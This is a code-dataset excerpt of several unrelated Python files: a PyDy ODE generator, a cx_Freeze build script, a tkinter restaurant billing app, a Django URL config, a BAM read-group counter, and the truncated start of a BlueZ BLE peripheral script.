else:\n super(TheanoODEFunctionGenerator, self).__init__(*args, **kwargs)\n\n def define_inputs(self):\n\n if self.specifieds is None:\n self.inputs = self.coordinates + self.speeds + self.constants\n else:\n self.inputs = (self.coordinates + self.speeds + self.specifieds\n + self.constants)\n\n def _theanoize(self, outputs):\n\n self.define_inputs()\n\n f = theano_function(self.inputs, outputs, on_unused_input='ignore')\n\n # Theano will run faster if you trust the input. I'm not sure\n # what the implications of this are. See:\n # http://deeplearning.net/software/theano/tutorial/faq.html#faster-small-theano-function\n # Note that map(np.asarray, np.hstack(args)) is required if\n # trust_input is True. If it is False, then it will sanitize the\n # inputs. I'm not sure which one is faster.\n f.trust_input = True\n\n return f\n\n def generate_full_rhs_function(self):\n\n outputs = [self.right_hand_side]\n\n f = self._theanoize(outputs)\n\n def eval_arrays(*args):\n vals = map(np.asarray, np.hstack(args))\n return np.squeeze(f(*vals))\n\n self.eval_arrays = eval_arrays\n\n def generate_full_mass_matrix_function(self):\n\n outputs = [self.mass_matrix, self.right_hand_side]\n\n f = self._theanoize(outputs)\n\n def eval_arrays(*args):\n vals = map(np.asarray, np.hstack(args))\n return tuple([np.squeeze(o) for o in f(*vals)])\n\n self.eval_arrays = eval_arrays\n\n def generate_min_mass_matrix_function(self):\n\n outputs = [self.mass_matrix, self.right_hand_side,\n self.coordinate_derivatives]\n\n f = self._theanoize(outputs)\n\n def eval_arrays(*args):\n vals = map(np.asarray, np.hstack(args))\n return tuple([np.squeeze(o) for o in f(*vals)])\n\n self.eval_arrays = eval_arrays\n\n\ndef generate_ode_function(*args, **kwargs):\n \"\"\"This is a function wrapper to the above classes. The docstring is\n automatically generated below.\"\"\"\n\n generators = {'lambdify': LambdifyODEFunctionGenerator,\n 'cython': CythonODEFunctionGenerator,\n 'theano': TheanoODEFunctionGenerator}\n\n generator = kwargs.pop('generator', 'lambdify')\n\n try:\n # See if user passed in a custom class.\n g = generator(*args, **kwargs)\n except TypeError:\n # See if user passed in a string.\n try:\n Generator = generators[generator]\n g = Generator(*args, **kwargs)\n except KeyError:\n msg = '{} is not a valid generator.'.format(generator)\n raise NotImplementedError(msg)\n else:\n return g.generate()\n else:\n return g.generate()\n\n\n_divider = '\\n Notes\\n ====='\n_docstr = ODEFunctionGenerator.__init__.__doc__\n_before_notes, _after_notes = _docstr.split(_divider)\n_extra_parameters_doc = \\\n\"\"\"\\\n generator : string or and ODEFunctionGenerator, optional\n The method used for generating the numeric right hand side. The\n string options are {'lambdify'|'theano'|'cython'} with\n 'lambdify' being the default. You can also pass in a custom\n subclass of ODEFunctionGenerator.\n\n Returns\n =======\n rhs : function\n A function which evaluates the derivaties of the states. See the\n function's docstring for more details after generation.\n\"\"\"\ngenerate_ode_function.__doc__ = ('' * 4 + _before_notes +\n _extra_parameters_doc + _divider +\n _after_notes)\n","sub_path":"pydy/codegen/ode_function_generators.py","file_name":"ode_function_generators.py","file_ext":"py","file_size_in_byte":34892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"282622838","text":"#\n# python setup.py build\n\nfrom cx_Freeze import setup, Executable\nimport sys\nimport os\nimport shutil\nimport zipfile\n\n\n__appname__ = \"userial-qt5\"\n__version__ = \"0.9.0\"\n__icon__ = os.path.join(os.curdir, 'rc', 'logo.ico')\n__author__ = \"Aleksandr Smirnov\"\n__copyright__ = \"Copyright 2016 by Navi-Dals\"\n\n\nBUILD_DIR = \"exe.{}-{}\".format(sys.platform, sys.version[:3])\npath_build = os.path.join(os.curdir, \"build\", BUILD_DIR)\n\n\n# Build executable file\nbuild_exe_options = {\"excludes\": [\"xml\", \"email\", \"html\", \"http\", \"unittest\", \"urllib\",\n \"pydoc_data\", \"\"]}\n\nexe = Executable(\n script=\"main.py\",\n base=\"Win32GUI\",\n targetName=__appname__ + \".exe\",\n icon=__icon__\n)\n\ntry:\n setup(\n name=__appname__ + \".exe\",\n version=__version__,\n author=__author__,\n description=__copyright__,\n options={\"build_exe\": build_exe_options},\n executables=[exe]\n )\nexcept Exception as e:\n print(e)\n\n# Remove nonusble resource\nprint(\"Remove nonusble resource\", end=10*'.')\ntry:\n path_rm = os.path.join(path_build, \"PyQt5\", \"Qt\")\n if os.path.exists(path_rm):\n shutil.rmtree(path_rm)\n print('Ok')\nexcept Exception as e:\n print('Error')\n print(e)\n\n# Create zip\nprint(\"Create zip file\", end=10*'.')\ntry:\n def zipdir(path, ziph):\n for root, dirs, files in os.walk(path):\n for file in files:\n ziph.write(os.path.join(root, file))\n\n zip_name = '.'.join(['{}-{}'.format(__appname__, __version__), 'zip'])\n\n zipf = zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED)\n zipdir(path_build, zipf)\n zipf.close()\n\n zip_dist = os.path.join(os.curdir, \"zip\")\n if not os.path.exists(zip_dist):\n os.makedirs(zip_dist)\n\n shutil.move(os.path.join(os.curdir, zip_name), os.path.join(zip_dist))\n\n print('Ok')\nexcept Exception as e:\n print(\"Error\")\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"363905947","text":"from tkinter import*\r\nfrom tkinter import messagebox\r\nimport random\r\nimport time\r\nimport win1_bk\r\n\r\n\r\nroot=Tk()\r\nroot.geometry(\"1600x8000\")\r\nroot.title(\"My Restaurant\")\r\n\r\nTops = Frame(root,width=100, relief=SUNKEN)\r\nTops.pack(side=TOP)\r\n\r\ns1 = Frame(root,width=1800, height =700, relief=SUNKEN)\r\ns1.pack(padx=10,pady=10)\r\n\r\n#s2 = Frame(root,width=600, height =300,bg=\"powder blue\", relief=SUNKEN)\r\n#s2.pack(side=RIGHT)\r\n\r\nlab1= Label(Tops, font=('arial',50,'bold'),text=\" My Restaurant \", fg= \"Green\", bd=10,anchor='w')\r\nlab1.grid(row=0,column=0)\r\n\r\nct=time.asctime(time.localtime(time.time()))\r\nlab2= Label(Tops, font=('arial',20,'bold'),text=ct, fg= \"Green\", bd=10,anchor='w')\r\nlab2.grid(row=1,column=0)\r\n\r\nlab3= Label(s1, font=('arial',20,'bold'),text=\"Login-ID\", fg= \"Blue\", bd=10,anchor='w')\r\nlab3.grid(row=0,column=0)\r\n\r\ntext1=StringVar()\r\ntxtShow=Entry(s1,font=('arial',20,'bold'),textvariable=text1,bd=3,insertwidth=4,bg=\"powder blue\", justify='left')\r\ntxtShow.grid(row=0,column=1)\r\n\r\nlab4= Label(s1, font=('arial',20,'bold'),text=\"Password\", fg= \"Blue\", bd=10,anchor='w')\r\nlab4.grid(row=1,column=0)\r\n\r\ntext2=StringVar()\r\ntxtShow1=Entry(s1,font=('arial',20,'bold'),textvariable=text2,bd=3,insertwidth=4,bg=\"powder blue\", justify='left', show='*')\r\ntxtShow1.grid(row=1,column=1)\r\nrand = StringVar()\r\n\r\nIdly=StringVar()\r\nDosa=StringVar()\r\nKesari=StringVar()\r\nSubTotal=StringVar()\r\nTotal=StringVar()\r\nService_Charge=StringVar()\r\nDrinks=StringVar()\r\nTax=StringVar()\r\nCost=StringVar()\r\nPulav=StringVar()\r\n\r\ndef adduser():\r\n for widget in s1.winfo_children():\r\n widget.destroy()\r\n lab5= Label(s1, font=('arial',20,'bold'),text='Add New User', fg= \"Blue\", bd=10,anchor='w')\r\n lab5.grid(row=0,column=0)\r\n lab3= Label(s1, font=('arial',20,'bold'),text=\"User-ID\", fg= \"Blue\", bd=10,anchor='w')\r\n lab3.grid(row=1,column=0)\r\n text1=StringVar()\r\n txtShow=Entry(s1,font=('arial',20,'bold'),textvariable=text1,bd=3,insertwidth=4,bg=\"powder blue\", justify='left')\r\n txtShow.grid(row=0,column=1)\r\n\r\n lab4= Label(s1, font=('arial',20,'bold'),text=\"Password\", fg= \"Blue\", bd=10,anchor='w')\r\n lab4.grid(row=1,column=0)\r\n\r\n text2=StringVar()\r\n txtShow1=Entry(s1,font=('arial',20,'bold'),textvariable=text2,bd=3,insertwidth=4,bg=\"powder blue\", justify='left', show='*')\r\n txtShow1.grid(row=1,column=1)\r\n \r\n b2=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Submit\", bg=\"powder blue\", command=lambda:win1_bk.add(text1.get(),text2.get())).grid(row=3,column=1)\r\n \r\n b1=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Home\", bg=\"powder blue\", command=lambda:show_admin()).grid(row=4,column=1)\r\n\r\ndef deluser():\r\n for widget in s1.winfo_children():\r\n widget.destroy()\r\n lab5= Label(s1, font=('arial',20,'bold'),text='Delete User', fg= \"Blue\", bd=10,anchor='w')\r\n lab5.grid(row=0,column=0)\r\n lab3= Label(s1, font=('arial',20,'bold'),text=\"User-ID\", fg= \"Blue\", bd=10,anchor='w')\r\n lab3.grid(row=1,column=0)\r\n text1=StringVar()\r\n txtShow=Entry(s1,font=('arial',20,'bold'),textvariable=text1,bd=3,insertwidth=4,bg=\"powder blue\", justify='left')\r\n txtShow.grid(row=1,column=1)\r\n \r\n b2=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Delete\", bg=\"powder blue\", command=lambda:win1_bk.delete(text1.get())).grid(row=3,column=1)\r\n b1=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Home\", bg=\"powder blue\", command=lambda:show_admin()).grid(row=4,column=1)\r\n\r\n\r\ndef showuser():\r\n for widget in s1.winfo_children():\r\n widget.destroy()\r\n lab3= Label(s1, font=('arial',20,'bold'),text=\" List of Users\", fg= \"Blue\", bd=10,anchor='w')\r\n lab3.grid(row=0,column=1)\r\n lb=Listbox(s1,height=20,width=94)\r\n lb.grid(row=2,column=0,columnspan=6)\r\n #lb.delete(0,END)\r\n for row in win1_bk.viewall():\r\n lb.insert(END,row)\r\n \r\n b1=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Home\", bg=\"powder blue\", command=lambda:show_admin()).grid(row=8,column=1)\r\n\r\ndef show_admin():\r\n for widget in s1.winfo_children():\r\n widget.destroy()\r\n \r\n b1=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"create user\", bg=\"powder blue\", command=lambda:adduser()).grid(row=0,column=1)\r\n b2=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"delete user\", bg=\"powder blue\", command=lambda:deluser()).grid(row=1,column=1)\r\n b3=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"show users\", bg=\"powder blue\", command=lambda:showuser()).grid(row=2,column=1)\r\n b4=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Main Project\", bg=\"powder blue\", command=lambda:call_sys()).grid(row=3,column=1)\r\n\r\n#====================================Restaraunt Info 1===========================================================\r\ndef Invent():\r\n for widget in s1.winfo_children():\r\n widget.destroy()\r\n \r\n Idly=StringVar()\r\n Dosa=StringVar()\r\n Kesari=StringVar()\r\n Pulav=StringVar()\r\n Drinks=StringVar()\r\n home()\r\n\r\ndef qExit():\r\n root.destroy()\r\n\r\n\r\n \r\ndef showinvent():\r\n for widget in s1.winfo_children():\r\n widget.destroy()\r\n lab3= Label(s1, font=('arial',20,'bold'),text=\" List of Stocks\", fg= \"Blue\", bd=10,anchor='w')\r\n lab3.grid(row=0,column=1)\r\n lb=Listbox(s1,height=20,width=94)\r\n lb.grid(row=2,column=0,columnspan=6)\r\n #lb.delete(0,END)\r\n import win1_bk\r\n rows=win1_bk.viewstock()\r\n lb.insert(END,'IDLY : ',rows[0][1])\r\n lb.insert(END,'DOSA : ',rows[0][2])\r\n lb.insert(END,'KESARI : ',rows[0][3])\r\n lb.insert(END,'DRINKS : ',rows[0][4])\r\n lb.insert(END,'PULAV : ',rows[0][5])\r\n b1=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Home\", bg=\"powder blue\", command=lambda:home()).grid(row=8,column=1)\r\n\r\ndef upd():\r\n messagebox.showinfo(Idly.get(),Dosa.get())\r\n #win1_bk.update(1,Idly.get(),Dosa.get(),Kesari.get(),Drinks.get(),Pulav.get())\r\n\r\ndef invent():\r\n for widget in s1.winfo_children():\r\n widget.destroy()\r\n lblhd= Label(s1, font=('arial', 16, 'bold'),text=\"Update the current Quantity\",bd=16,anchor=\"w\")\r\n lblIdly= Label(s1, font=('arial', 16, 'bold'),text=\"Idly\",bd=16,anchor=\"w\")\r\n lblIdly.grid(row=1, column=0)\r\n Idly=StringVar()\r\n #e4 = Entry(window,textvariable=category,width=50)\r\n txtIdly=Entry(s1, font=('arial',16,'bold'),textvariable=Idly)#,bd=1,insertwidth=4,bg=\"powder blue\",justify='left')\r\n txtIdly.grid(row=1,column=1)\r\n\r\n\r\n lblDosa= Label(s1, font=('arial', 16, 'bold'),text=\"Dosa\",bd=16,anchor=\"w\")\r\n lblDosa.grid(row=2, column=0)\r\n Dosa=StringVar()\r\n txtDosa=Entry(s1, font=('arial',16,'bold'),textvariable=Dosa)#,bd=1,insertwidth=4,bg=\"powder blue\",justify='left')\r\n txtDosa.grid(row=2,column=1)\r\n\r\n\r\n lblKesari= Label(s1, font=('arial', 16, 'bold'),text=\"Kesari bath\",bd=16,anchor=\"w\")\r\n lblKesari.grid(row=3, column=0)\r\n Kesari=StringVar()\r\n txtKesari=Entry(s1, font=('arial',16,'bold'),textvariable=Kesari)#,bd=1,insertwidth=4,bg=\"powder blue\",justify='left')\r\n txtKesari.grid(row=3,column=1)\r\n\r\n lblPulav= Label(s1, font=('arial', 16, 'bold'),text=\"Pulav\",bd=16,anchor=\"w\")\r\n lblPulav.grid(row=4, column=0)\r\n Pulav=StringVar()\r\n txtPulav=Entry(s1, font=('arial',16,'bold'),textvariable=Pulav)#,bd=1,insertwidth=4,bg=\"powder blue\",justify='left')\r\n txtPulav.grid(row=4,column=1)\r\n\r\n lblDrinks= Label(s1, font=('arial', 16, 'bold'),text=\"Drinks\",bd=16,anchor=\"w\")\r\n lblDrinks.grid(row=5, column=0)\r\n Drinks=StringVar()\r\n txtDrinks=Entry(s1, font=('arial',16,'bold'),textvariable=Drinks)#,bd=1,insertwidth=4,bg=\"powder blue\",justify='left')\r\n txtDrinks.grid(row=5,column=1)\r\n \r\n b1=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Update\", bg=\"powder blue\", command=lambda:win1_bk.update(1,Idly.get(),Dosa.get(),Kesari.get(),Drinks.get(),Pulav.get())).grid(row=8,column=1)\r\n b2=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Home\", bg=\"powder blue\", command=lambda:home()).grid(row=10,column=1)\r\n\r\ndef home():\r\n for widget in s1.winfo_children():\r\n widget.destroy()\r\n b1=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\" Update Inventory\", bg=\"powder blue\", command=lambda:invent()).grid(row=0,column=1)\r\n b2=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Show Inventory\", bg=\"powder blue\", command=lambda:showinvent()).grid(row=1,column=1)\r\n b3=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Home \", bg=\"powder blue\", command=lambda:call_sys()).grid(row=2,column=1)\r\n\r\ndef Ref():\r\n x=random.randint(10908,500876)\r\n randomRef=str(x)\r\n\r\n rand.set(randomRef)\r\n\r\n if (Idly.get()==\"\"):\r\n CoIdly=0\r\n else:\r\n CoIdly=float(Idly.get())\r\n\r\n \r\n if (Dosa.get()==\"\"):\r\n CoDosa=0\r\n else:\r\n CoDosa=float(Dosa.get())\r\n\r\n if (Kesari.get()==\"\"):\r\n CoKesari=0\r\n else:\r\n CoKesari=float(Kesari.get())\r\n\r\n if (Pulav.get()==\"\"):\r\n CoPulav=0\r\n else:\r\n CoPulav=float(Pulav.get())\r\n \r\n \r\n if (Drinks.get()==\"\"):\r\n CoD=0\r\n else:\r\n CoD=float(Drinks.get())\r\n \r\n CostofIdly =CoIdly * 25\r\n CostofDrinks=CoD * 20\r\n CostofDosa = CoDosa* 35\r\n CostofKesari = CoKesari * 25\r\n CostPulav = CoPulav* 35\r\n \r\n CostofMeal= \"Rs\", str('%.2f' % (CostofIdly+CostofDrinks+CostofDosa+CostofKesari+CostPulav))\r\n\r\n PayTax=((CostofIdly+CostofDrinks+CostofDosa+CostofKesari+CostPulav) * 0.2)\r\n\r\n TotalCost=(CostofIdly+CostofDrinks+CostofDosa+CostofKesari+CostPulav)\r\n \r\n Ser_Charge= ((CostofIdly+CostofDrinks+CostofDosa+CostofKesari+CostPulav)/99)\r\n\r\n Service = \"Rs\", str ('%.2f' % Ser_Charge)\r\n\r\n OverAllCost =\"Rs\", str ('%.2f' % (PayTax+TotalCost+Ser_Charge))\r\n\r\n PaidTax= \"Rs\", str ('%.2f' % PayTax)\r\n\r\n Service_Charge.set(Service)\r\n Cost.set(CostofMeal)\r\n Tax.set(PaidTax)\r\n SubTotal.set(CostofMeal)\r\n Total.set(OverAllCost)\r\n win1_bk.updateB(1,Idly.get(),Dosa.get(),Kesari.get(),Drinks.get(),Pulav.get())\r\n \r\ndef Reset():\r\n rand.set(\"\") \r\n Idly.set(\"\")\r\n Dosa.set(\"\")\r\n Kesari.set(\"\")\r\n SubTotal.set(\"\")\r\n Total.set(\"\")\r\n Service_Charge.set(\"\")\r\n Drinks.set(\"\")\r\n Tax.set(\"\")\r\n Cost.set(\"\")\r\n Pulav.set(\"\")\r\n \r\n\r\n\r\ndef Bill():\r\n for widget in s1.winfo_children():\r\n widget.destroy()\r\n \r\n \r\n lblReference= Label(s1, font=('arial', 16, 'bold'),text=\"Reference\",bd=16,anchor=\"w\")\r\n lblReference.grid(row=0, column=0)\r\n \r\n txtReference=Entry(s1, font=('arial',16,'bold'),textvariable=rand,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtReference.grid(row=0,column=1)\r\n\r\n lblIdly= Label(s1, font=('arial', 16, 'bold'),text=\"Idly\",bd=16,anchor=\"w\")\r\n lblIdly.grid(row=1, column=0)\r\n txtIdly=Entry(s1, font=('arial',16,'bold'),textvariable=Idly,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtIdly.grid(row=1,column=1)\r\n\r\n\r\n lblDosa= Label(s1, font=('arial', 16, 'bold'),text=\"Dosa\",bd=16,anchor=\"w\")\r\n lblDosa.grid(row=2, column=0)\r\n txtDosa=Entry(s1, font=('arial',16,'bold'),textvariable=Dosa,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtDosa.grid(row=2,column=1)\r\n\r\n\r\n lblKesari= Label(s1, font=('arial', 16, 'bold'),text=\"Kesari bath\",bd=16,anchor=\"w\")\r\n lblKesari.grid(row=3, column=0)\r\n txtKesari=Entry(s1, font=('arial',16,'bold'),textvariable=Kesari,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtKesari.grid(row=3,column=1)\r\n\r\n lblPulav= Label(s1, font=('arial', 16, 'bold'),text=\"Pulav\",bd=16,anchor=\"w\")\r\n lblPulav.grid(row=4, column=0)\r\n txtPulav=Entry(s1, font=('arial',16,'bold'),textvariable=Pulav,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtPulav.grid(row=4,column=1)\r\n\r\n \r\n lblDrinks= Label(s1, font=('arial', 16, 'bold'),text=\"Drinks\",bd=16,anchor=\"w\")\r\n lblDrinks.grid(row=0, column=2)\r\n txtDrinks=Entry(s1, font=('arial',16,'bold'),textvariable=Drinks,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtDrinks.grid(row=0,column=3)\r\n\r\n lblCost= Label(s1, font=('arial', 16, 'bold'),text=\"Cost of Meal\",bd=16,anchor=\"w\")\r\n lblCost.grid(row=1, column=2)\r\n txtCost=Entry(s1, font=('arial',16,'bold'),textvariable=Cost,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtCost.grid(row=1,column=3)\r\n\r\n\r\n lblService= Label(s1, font=('arial', 16, 'bold'),text=\"Service Charge\",bd=16,anchor=\"w\")\r\n lblService.grid(row=2, column=2)\r\n txtService=Entry(s1, font=('arial',16,'bold'),textvariable=Service_Charge,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtService.grid(row=2,column=3)\r\n\r\n\r\n lblStateTax= Label(s1, font=('arial', 16, 'bold'),text=\"State Tax\",bd=16,anchor=\"w\")\r\n lblStateTax.grid(row=3, column=2)\r\n txtStateTax=Entry(s1, font=('arial',16,'bold'),textvariable=Tax,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtStateTax.grid(row=3,column=3)\r\n\r\n lblSubTotal= Label(s1, font=('arial', 16, 'bold'),text=\"Sub Total\",bd=16,anchor=\"w\")\r\n lblSubTotal.grid(row=4, column=2)\r\n txtSubTotal=Entry(s1, font=('arial',16,'bold'),textvariable=SubTotal,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtSubTotal.grid(row=4,column=3)\r\n\r\n lblTotalCost= Label(s1, font=('arial', 16, 'bold'),text=\"Total Cost\",bd=16,anchor=\"w\")\r\n lblTotalCost.grid(row=5, column=2)\r\n txtTotalCost=Entry(s1, font=('arial',16,'bold'),textvariable=Total,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtTotalCost.grid(row=5,column=3)\r\n Reset()\r\n\r\n #==========================================Buttons==========================================================================================\r\n btnTotal=Button(s1,padx=16,pady=8,bd=16,fg=\"black\",font=('arial',16,'bold'),width=10,text=\"Total\",bg=\"powder blue\",command=lambda:Ref()).grid(row=7,column=1)\r\n\r\n btnReset=Button(s1,padx=16,pady=8,bd=16,fg=\"black\",font=('arial',16,'bold'),width=10,text=\"Reset\",bg=\"powder blue\",command=lambda:Reset()).grid(row=7,column=2)\r\n\r\n btnExit=Button(s1,padx=16,pady=8,bd=16,fg=\"black\",font=('arial',16,'bold'),width=10,text=\"Home\",bg=\"powder blue\",command=lambda:call_sys()).grid(row=7,column=3)\r\n\r\n \r\ndef call_sys():\r\n for widget in s1.winfo_children():\r\n widget.destroy()\r\n #lab3= Label(s1, font=('arial',20,'bold'),text=\"Restaurant Billing\" , fg= \"Blue\", bd=10,anchor='w')\r\n #lab3.grid(row=0,column=1)\r\n b1=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Inventory\", bg=\"powder blue\", command=lambda:Invent()).grid(row=0,column=1)\r\n b2=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Generate Bill\", bg=\"powder blue\", command=lambda:Bill()).grid(row=1,column=1)\r\n b3=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Exit Project\", bg=\"powder blue\", command=lambda:root.destroy()).grid(row=2,column=1)\r\n\r\n\r\ndef btnClick():\r\n \r\n if text1.get()=='admin' and text2.get()=='admin':\r\n show_admin()\r\n else:\r\n rows = win1_bk.search(text1.get(),text2.get())\r\n if not rows:\r\n messagebox.showinfo(' wrong','try again')\r\n else:\r\n if text1.get()== rows[0][1] and text2.get()== rows[0][2]:\r\n #root.destroy() \r\n call_sys()\r\n \r\n \r\nbtn1=Button(s1,padx=1,pady=10,bd=1,font=('arial',20),text=\"submit\", bg=\"powder blue\", command=lambda:btnClick()).grid(row=3,column=1)\r\n\r\nroot.mainloop()\r\n","sub_path":"win2.py","file_name":"win2.py","file_ext":"py","file_size_in_byte":16276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"333927517","text":"from django.urls import path, include\nfrom . import views\n\n\napp_name = 'monthly_goal'\nurlpatterns = [\n path('', include('account.urls')),\n path(\n 'goal/new/',\n views.MonthlyGoalCreateView.as_view(template_name='monthly_goal/goal_create.html'),\n name='goal-create'\n ),\n path(\n 'goal//', views.MonthlyGoalDetailView.as_view(\n template_name='monthly_goal/goal_detail.html'), name='goal-detail'\n ),\n path(\n 'goal//update', views.MonthlyGoalUpdateView.as_view(\n template_name='monthly_goal/goal_update.html'),\n name='goal-update'\n ),\n path(\n 'goal//delete', views.MonthlyGoalDeleteView.as_view(\n template_name='monthly_goal/goal_delete.html'),\n name='goal-delete'\n ),\n]\n","sub_path":"self_management/monthly_goal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"233522365","text":"#! /usr/bin/env python2\n\ndef main():\n\n #\n # Imports & globals\n #\n global args, summaryInstance, sys, time, pysam, infile\n import pysam, sys, time\n\n #\n # Argument parsing\n #\n argumentsInstance = readArgs()\n\n #\n # Initials\n #\n barcode_dict = dict()\n read_counter = 0\n read_counter_currently = 0\n reads_without_RG = 0\n\n infile = pysam.AlignmentFile(args.bam_file, 'rb')\n report_progress('Infile opened, starting analysis')\n for read in infile.fetch(until_eof=True):\n\n # Skips read if no barcode tag is present\n try: barcode_ID = read.get_tag(args.tag)\n except KeyError:\n reads_without_RG += 1\n continue\n\n try: barcode_dict[barcode_ID] += 1\n except KeyError:\n barcode_dict[barcode_ID] = 1\n\n read_counter += 1\n read_counter_currently += 1\n if read_counter_currently == 1000000:\n read_counter_currently = 0\n report_progress(\"{:,}\".format(read_counter) + ' reads processed')\n\n barcode_clusters = 0\n good_barcode_clusters = 0\n phased_clusters = 0\n at_least_read_pair = 0\n for barcode, number_of in barcode_dict.items():\n\n barcode_clusters += 1\n if number_of >= 8: good_barcode_clusters += 1\n if number_of >= 2: at_least_read_pair += 1\n if number_of >= 4: phased_clusters += 1\n\n print('\\nANALYSIS FINISHED')\n print('\\nNUMBER OF READ GROUPS FOUND: ' + str(barcode_clusters))\n print('WITH 2 OR MORE READS: ' + str(at_least_read_pair))\n print('WITH 4 OR MORE READS: ' + str(phased_clusters))\n print('WITH 8 OR MORE READS: ' + str(good_barcode_clusters))\n print('\\nREADS PAIRS WITHOUT RG TAG: ' + str((reads_without_RG/2)))\n\n infile.close()\n\ndef report_progress(string):\n \"\"\"\n Writes a time stamp followed by a message (=string) to standard out.\n Input: String\n Output: [date] string\n \"\"\"\n sys.stderr.write(time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime()) + '\\t' + string + '\\n')\n\nclass readArgs(object):\n \"\"\"\n Reads arguments and handles basic error handling like python version control etc.\n \"\"\"\n\n def __init__(self):\n\n readArgs.parse(self)\n readArgs.pythonVersion(self)\n\n def parse(self):\n\n #\n # Imports & globals\n #\n import argparse, multiprocessing\n global args\n\n parser = argparse.ArgumentParser(description=__doc__)\n\n # Arguments\n parser.add_argument(\"bam_file\", help=\".bam file tagged with @RG tags).\")\n\n # Options\n parser.add_argument(\"-F\", \"--force_run\", action=\"store_true\", help=\"Run analysis even if not running python 3. \"\n \"Not recommended due to different function \"\n \"names in python 2 and 3.\")\n parser.add_argument(\"-t\", \"--tag\", type=str, default='RG', help=\"Tag in which barcode is stored. DEFAULT: RG\")\n\n args = parser.parse_args()\n\n def pythonVersion(self):\n \"\"\" Makes sure the user is running python 3.\"\"\"\n\n #\n # Version control\n #\n import sys\n if sys.version_info.major == 3:\n pass\n else:\n sys.stderr.write('\\nWARNING: you are running python ' + str(\n sys.version_info.major) + ', this script is written for python 3.')\n if not args.force_run:\n sys.stderr.write('\\nAborting analysis. Use -F (--Force) to run anyway.\\n')\n sys.exit()\n else:\n sys.stderr.write('\\nForcing run. This might yield inaccurate results.\\n')\n\nif __name__==\"__main__\": main()","sub_path":"archive/count_RG_in_bam.py","file_name":"count_RG_in_bam.py","file_ext":"py","file_size_in_byte":3733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"493870206","text":"#!/usr/bin/python3\n\nimport dbus.mainloop.glib\nfrom bluez_components import *\nfrom datetime import datetime\n\nnow = datetime.now()\n\ntry:\n from gi.repository import GObject\nexcept ImportError:\n import gobject as GObject\n\nUUID_DEVICE_CONTROL_SERVICE = \"21c50462-67cb-63a3-5c4c-82b5b9939aeb\"\nUUID_LED_VIBRATE_CTRL_CHAR = \"21c50462-67cb-63a3-5c4c-82b5b9939aec\"\nUUID_BUTTON_NOTIF_CHAR = \"21c50462-67cb-63a3-5c4c-82b5b9939aed\"\nUUID_UNKNOWN_CHAR = \"21c50462-67cb-63a3-5c4c-82b5b9939aee\"\nUUID_FW_UPDATE_REQUEST_CHAR = \"21c50462-67cb-63a3-5c4c-82b5b9939aef\"\nUUID_FW_VERSION_CHAR = \"21c50462-67cb-63a3-5c4c-82b5b9939af0\"\nUUID_CERTIFICATE_SERVICE = \"bbe87709-5b89-4433-ab7f-8b8eef0d8e37\"\nUUID_CENTRAL_TO_SFIDA_CHAR = \"bbe87709-5b89-4433-ab7f-8b8eef0d8e38\"\nUUID_SFIDA_COMMANDS_CHAR = \"bbe87709-5b89-4433-ab7f-8b8eef0d8e39\"\nUUID_SFIDA_TO_CENTRAL_CHAR = \"bbe87709-5b89-4433-ab7f-8b8eef0d8e3a\"\nUUID_BATTERY_SERVICE = \"180f\"\nUUID_BATTERY_LEVEL_CHAR = \"2A19\"\nUUID_CLIENT_CHARACTERISTIC_CONFIG = \"2902\"\n\nmainloop = None\n\n\nclass fw_update_request_chrc(Characteristic):\n def __init__(self, bus, index, service):\n self.UUID = UUID_FW_UPDATE_REQUEST_CHAR\n Characteristic.__init__(\n self, bus, index,\n self.UUID,\n ['write'],\n service)\n self.value = 0\n\n def WriteValue(self, value, options):\n self.value = value\n log(self.UUID)\n\n\nclass fw_version_chrc(Characteristic):\n def __init__(self, bus, index, service):\n self.UUID = UUID_FW_VERSION_CHAR\n\n Characteristic.__init__(\n self, bus, index,\n self.UUID,\n ['read'],\n service)\n self.value = 0\n\n def ReadValue(self, options):\n log(self.UUID)\n return [dbus.Byte(self.value)]\n\n\nclass led_vibrate_chrc(Characteristic):\n def __init__(self, bus, index, service):\n self.UUID 